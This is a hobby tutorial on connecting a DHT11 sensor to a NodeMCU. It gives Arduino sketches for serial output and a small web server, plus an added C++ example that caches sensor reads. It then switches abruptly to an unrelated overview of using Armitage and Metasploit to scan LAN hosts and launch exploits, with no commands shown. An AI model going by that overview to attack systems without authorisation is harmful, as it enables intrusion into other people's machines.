How to connect the DHT11 to the NodeMCU
Connecting the DHT11 to the NodeMCU is simple, but the connection method varies depending on whether you are using a 3-pin sensor or a 4-pin sensor.
The connections are as follows:
The +3V pin of the NodeMCU connects to the pin marked (+ or VCC) on the DHT11.
The pin marked (S or OUT) on the DHT11 connects to the D4 pin of the NodeMCU.
The GND pin of the NodeMCU connects to the pin marked (- or GND) on the DHT11.
The code is as follows
#include <SimpleDHT.h>

// for DHT11,
//   VCC: 5V or 3V
//   GND: GND
//   DATA: 2 (GPIO2 is the pin labelled D4 on the NodeMCU)
int pinDHT11 = 2;
SimpleDHT11 dht11(pinDHT11);

void setup() {
  Serial.begin(115200);
}

void loop() {
  // start working.
  Serial.println("=================================");
  Serial.println("Sample DHT11.");

  // read without samples.
  byte temperature = 0;
  byte humidity = 0;
  int err = SimpleDHTErrSuccess;
  // SimpleDHT11::read() takes pointers to the output variables.
  if ((err = dht11.read(&temperature, &humidity, NULL)) != SimpleDHTErrSuccess) {
    Serial.print("Read DHT11 failed, err="); Serial.println(err); delay(1000);
    return;
  }

  Serial.print("Sample OK: ");
  Serial.print((int)temperature); Serial.print(" *C, ");
  Serial.print((int)humidity); Serial.println(" H");

  // DHT11 sampling rate is 1HZ.
  delay(1500);
}
github address
User demo
DHT11 + web version
Let's look at the result first (see the figure).
The DHT11 readings are served through a web server.
Development ideas
We first need to install two libraries: DHT and Adafruit Unified Sensor.
The code is as follows:
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include "DHT.h"

// Uncomment one of the lines below for whatever DHT sensor type you're using!
#define DHTTYPE DHT11   // DHT 11
//#define DHTTYPE DHT21 // DHT 21 (AM2301)
//#define DHTTYPE DHT22 // DHT 22 (AM2302), AM2321

/* Put your SSID and password here */
const char* ssid = "kali";            // Enter SSID here
const char* password = "12345678900"; // Enter password here

ESP8266WebServer server(80);

// DHT sensor
uint8_t DHTPin = D4;

// Initialize DHT sensor.
DHT dht(DHTPin, DHTTYPE);

float Temperature;
float Humidity;

void setup() {
  Serial.begin(115200);
  delay(100);

  pinMode(DHTPin, INPUT);
  dht.begin();

  Serial.println("Connecting to ");
  Serial.println(ssid);

  // connect to your local wi-fi network
  WiFi.begin(ssid, password);

  // wait until the wi-fi connection is up
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.print(".");
  }
  Serial.println("");
  Serial.println("WiFi connected.");
  Serial.print("Got IP: "); Serial.println(WiFi.localIP());

  server.on("/", handle_OnConnect);
  server.onNotFound(handle_NotFound);

  server.begin();
  Serial.println("HTTP server started");
}

void loop() {
  server.handleClient();
}

void handle_OnConnect() {
  Temperature = dht.readTemperature(); // Gets the value of the temperature
  Humidity = dht.readHumidity();       // Gets the value of the humidity
  server.send(200, "text/html", SendHTML(Temperature, Humidity));
}

void handle_NotFound() {
  server.send(404, "text/plain", "Not found");
}

String SendHTML(float Temperaturestat, float Humiditystat) {
  String ptr = "<!DOCTYPE html> <html>\n";
  ptr += "<head><meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, user-scalable=no\">\n";
  ptr += "<link href=\"https://fonts.googleapis.com/css?family=Open+Sans:300,400,600\" rel=\"stylesheet\">\n";
  ptr += "<meta charset=\"UTF-8\">\n";
  ptr += "<title>Priess's nest—smart thermometer</title>\n";
  ptr += "<style>html { font-family: 'Open Sans', sans-serif; display: block; margin: 0px auto; text-align: center; color: #333333;}\n";
  ptr += "body{margin-top: 50px;}\n";
  ptr += "h1 {margin: 50px auto 30px;}\n";
  ptr += ".wd {margin: 50px auto 30px;width: auto;color: #f39c12}\n";
  ptr += ".wd1 {margin: 50px auto 30px;width: auto;color: #3498db}\n";
  ptr += ".side-by-side{display: inline-block;vertical-align: middle;position: relative;}\n";
  ptr += ".humidity-icon{background-color: #3498db;width: 30px;height: 30px;border-radius: 50%;line-height: 36px;}\n";
  ptr += ".humidity-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n";
  ptr += ".humidity{font-weight: 300;font-size: 60px;color: #3498db;}\n";
  ptr += ".temperature-icon{background-color: #f39c12;width: 30px;height: 30px;border-radius: 50%;line-height: 40px;}\n";
  ptr += ".temperature-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n";
  ptr += ".temperature{font-weight: 300;font-size: 60px;color: #f39c12;}\n";
  ptr += ".superscript{font-size: 17px;font-weight: 600;position: absolute;right: -20px;top: 15px;}\n";
  ptr += ".data{padding: 10px;}\n";
  ptr += "</style>\n";
  ptr += "</head>\n";
  ptr += "<body>\n";
  ptr += "<div id=\"webpage\">\n";
  ptr += "<h1>Indoor greenhouse detection system</h1>\n";
  ptr += "<div class=\"data\">\n";
  ptr += "<div class=\"side-by-side temperature-icon\">\n";
  ptr += "<svg version=\"1.1\" id=\"Layer_1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" x=\"0px\" y=\"0px\"\n";
  ptr += "width=\"9.915px\" height=\"22px\" viewBox=\"0 0 9.915 22\" enable-background=\"new 0 0 9.915 22\" xml:space=\"preserve\">\n";
  ptr += "<path fill=\"#FFFFFF\" d=\"M3.498,0.53c0.377-0.331,0.877-0.501,1.374-0.527C5.697-0.04,6.522,0.421,6.924,1.142\n";
  ptr += "c0.237,0.399,0.315,0.871,0.311,1.33C7.229,5.856,7.245,9.24,7.227,12.625c1.019,0.539,1.855,1.424,2.301,2.491\n";
  ptr += "c0.491,1.163,0.518,2.514,0.062,3.693c-0.414,1.102-1.24,2.038-2.276,2.594c-1.056,0.583-2.331,0.743-3.501,0.463\n";
  ptr += "c-1.417-0.323-2.659-1.314-3.3-2.617C0.014,18.26-0.115,17.104,0.1,16.022c0.296-1.443,1.274-2.717,2.58-3.394\n";
  ptr += "c0.013-3.44,0-6.881,0.007-10.322C2.674,1.634,2.974,0.955,3.498,0.53z\"/>\n";
  ptr += "</svg>\n";
  ptr += "</div>\n";
  ptr += "<div class=\"side-by-side temperature-text\">Indoor temperature: </div>\n";
  ptr += "<div class=\"side-by-side temperature\">";
  ptr += (int)Temperaturestat;
  ptr += "<span class=\"superscript\">°C</span></div>\n";
  ptr += "</div>\n";
  ptr += "<div class=\"data\">\n";
  ptr += "<div class=\"side-by-side humidity-icon\">\n";
  ptr += "<svg version=\"1.1\" id=\"Layer_2\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" x=\"0px\" y=\"0px\"\n";
  ptr += "width=\"12px\" height=\"17.955px\" viewBox=\"0 0 13 17.955\" enable-background=\"new 0 0 13 17.955\" xml:space=\"preserve\">\n";
  ptr += "<path fill=\"#FFFFFF\" d=\"M1.819,6.217C3.139,4.064,6.5,0,6.5,0s3.363,4.064,4.681,6.217c1.793,2.926,2.133,5.05,1.571,7.057\n";
  ptr += "c-0.438,1.574-2.264,4.681-6.252,4.681c-3.988,0-5.813-3.107-6.252-4.681C-0.313,11.267,0.026,9.143,1.819,6.217\"></path>\n";
  ptr += "</svg>\n";
  ptr += "</div>\n";
  ptr += "<div class=\"side-by-side humidity-text\">Indoor humidity: </div>\n";
  ptr += "<div class=\"side-by-side humidity\">";
  ptr += (int)Humiditystat;
  ptr += "<span class=\"superscript\">%</span></div>\n";
  ptr += "</div>\n";

  // Define the temperature variable and assign the value to use for logical judgment.
  int wd = Temperaturestat;
  if (wd >= 30) {
    ptr += "<div class=\"wd\">Hi~ Baby, the weather is so hot today, take care to prevent heatstroke!</div>\n";
  }
  if (29 >= wd && wd > 10) {
    ptr += "<div class=\"wd1\">Hi~ Baby, the weather is nice today, let's have fun!</div>\n";
  }
  if (wd <= 10) {
    ptr += "<div class=\"side-by-side humidity-text\">Hi~ The weather is cold today, wear more clothes and be careful not to catch a cold!</div>\n";
  }

  ptr += "</div>\n";
  ptr += "</body>\n";
  ptr += "</html>\n";
  return ptr;
}
I added a warm reminder on top of the original source: when the temperature falls into a different range, a different greeting is shown.
// Define the temperature variable and assign the value to use for logical judgment.
int wd = Temperaturestat;
if (wd >= 30) {
  ptr += "<div class=\"wd\">Hi~ Baby, the weather is so hot today, take care to prevent heatstroke!</div>\n";
}
if (29 >= wd && wd > 10) {
  ptr += "<div class=\"wd1\">Hi~ Baby, the weather is nice today, let's have fun!</div>\n";
}
if (wd <= 10) {
  ptr += "<div class=\"side-by-side humidity-text\">Hi~ The weather is cold today, wear more clothes and be careful not to catch a cold!</div>\n";
}
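The handler above reads the sensor on every HTTP request, but the first sketch already notes that the DHT11 samples at 1 Hz: two requests in quick succession make the second dht.readTemperature() call return NaN, and the sketch then casts NaN to int for the page. The following is an added example, not the tutorial's code: a cached reader that touches the sensor at most once per interval, keeps the last good sample when a read fails, and renders the same three temperature bands as the warm reminder. CachedDht, greetingFor and renderReading are names chosen here; the sensor read and clock are injected so the logic runs on a PC (on the board they would wrap the DHT read and millis()).

```cpp
#include <cmath>
#include <cstdint>
#include <cstdio>
#include <functional>
#include <initializer_list>
#include <string>

// What the sketch's handler gets back from dht.readTemperature()/readHumidity():
// the Adafruit DHT library returns NaN for a failed read, and the DHT11 fails
// when it is polled faster than about once per second.
struct Sample {
    float temperature;
    float humidity;
};

// Serves a cached sample so HTTP requests never hit the sensor faster than it
// can answer. readFn and clockFn are hypothetical injected callbacks.
class CachedDht {
public:
    CachedDht(std::function<Sample()> readFn, std::function<uint32_t()> clockFn,
              uint32_t minIntervalMs = 2000)
        : read_(std::move(readFn)), now_(std::move(clockFn)), interval_(minIntervalMs) {}

    // Returns false until the first successful read; after that it always
    // returns the last good sample, even if the latest refresh produced NaN.
    bool get(Sample& out) {
        uint32_t t = now_();
        // Unsigned subtraction stays correct when millis() wraps at 2^32.
        if (!everRead_ || (t - lastRead_) >= interval_) {
            everRead_ = true;
            lastRead_ = t;
            ++reads_;
            Sample s = read_();
            if (!std::isnan(s.temperature) && !std::isnan(s.humidity)) {
                last_ = s;
                haveGood_ = true;
            }
        }
        if (!haveGood_) return false;
        out = last_;
        return true;
    }

    unsigned sensorReads() const { return reads_; }  // how often the sensor was touched

private:
    std::function<Sample()> read_;
    std::function<uint32_t()> now_;
    uint32_t interval_;
    uint32_t lastRead_ = 0;
    unsigned reads_ = 0;
    bool everRead_ = false;
    bool haveGood_ = false;
    Sample last_{0.0f, 0.0f};
};

// The sketch's three temperature bands (>= 30, 11..29, <= 10) as one function,
// so every integer temperature gets exactly one greeting.
std::string greetingFor(int wd) {
    if (wd >= 30) return "hot: take care to prevent heatstroke";
    if (wd > 10)  return "nice: enjoy the day";
    return "cold: wear more clothes";
}

// Body the handler would send. A failed read yields a placeholder instead of
// casting NaN to int, which is undefined behaviour in C++.
std::string renderReading(CachedDht& dht) {
    Sample s{};
    if (!dht.get(s)) return "<p>Sensor not ready</p>";
    int wd = static_cast<int>(s.temperature);
    return "<p>Temperature: " + std::to_string(wd) + "&deg;C, humidity: " +
           std::to_string(static_cast<int>(s.humidity)) + "%</p>\n<p>" +
           greetingFor(wd) + "</p>";
}

int main() {
    // Constructed sensor: first read good, second fails (NaN), third good.
    int calls = 0;
    auto fakeSensor = [&calls]() {
        ++calls;
        if (calls == 2) return Sample{NAN, NAN};
        return Sample{calls == 1 ? 23.0f : 31.0f, calls == 1 ? 48.0f : 40.0f};
    };
    uint32_t fakeMillis = 0;
    CachedDht dht(fakeSensor, [&fakeMillis]() { return fakeMillis; });
    // Four "requests": the one at 500 ms is served from cache, the one at
    // 2000 ms hits the failed read and keeps the earlier values.
    for (uint32_t t : {0u, 500u, 2000u, 4000u}) {
        fakeMillis = t;
        std::printf("t=%u ms: %s\n", t, renderReading(dht).c_str());
    }
    return 0;
}
```

On the ESP8266 the same class would be constructed with lambdas around dht.readTemperature()/dht.readHumidity() and millis(), and handle_OnConnect would call renderReading instead of reading the sensor directly.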
Title: Penetration testing with Armitage
Armitage is a Java-based graphical front end for Metasploit. It lets you combine the exploits Metasploit already knows and run them against vulnerabilities on a host, largely from menus. Driving Metasploit from the command line is harder and means memorising a lot of commands; Armitage removes most of that, since a few clicks run a security test or an attack against the target host, and its graphical display makes the attack process easier to follow. Because it is so simple to operate it is well suited to people new to Metasploit who want to test and attack target systems.
Start
After startup it looks like the figure. If you get an error at this point, start PostgreSQL first; Armitage needs Metasploit's database.
Scan the target
To scan targets we can use Nmap or Msf modules.
As shown in the figure, we scanned some devices on the LAN.
There are Windows devices, printers, and Linux devices.
Now we can scan a single device.
You can see the ports currently open on that device.
Start the attack
Right-click and select Scan. Armitage calls Metasploit's vulnerability scanning modules, scans the target machine, finds existing vulnerabilities and gives a reference for deciding the attack method in the next step.
After success, the host's icon changes.
Of course, we can also attack with the various exploits the system offers.